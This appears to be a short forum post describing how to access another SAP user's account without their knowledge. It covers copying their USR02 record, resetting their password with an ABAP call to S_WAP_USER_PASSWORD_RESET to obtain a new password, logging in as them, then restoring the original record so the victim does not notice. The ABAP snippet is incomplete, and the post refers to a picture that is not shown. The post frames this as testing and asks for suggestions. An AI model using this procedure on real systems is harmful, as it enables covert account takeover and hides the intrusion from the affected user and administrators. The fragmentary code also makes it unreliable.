Security in SAP
There is a chance to get access to the users account by just making some changes in Table USR02.
i.e if we copy the data of that particular user into internal table from usr02
(working fine in Development Server)
then reset the user password using the following code,
data: t_return type bapiret2 occurs 0 with header line.
call function ‘S_WAP_USER_PASSWORD_RESET’
username = ‘TEST4’
return = t_return. ” to Reset user password
loop at t_return.
which gives us the password i.e t_return-message.
Then we shall be able to access that particular user’s account i.e ‘TEST4’.
later, the previously copied value i.e is shown in above pic will be added again , so that the user (TEST4) may not know that some one has accessed his account.
For Testing Purpose only.
Kindly share your suggestions.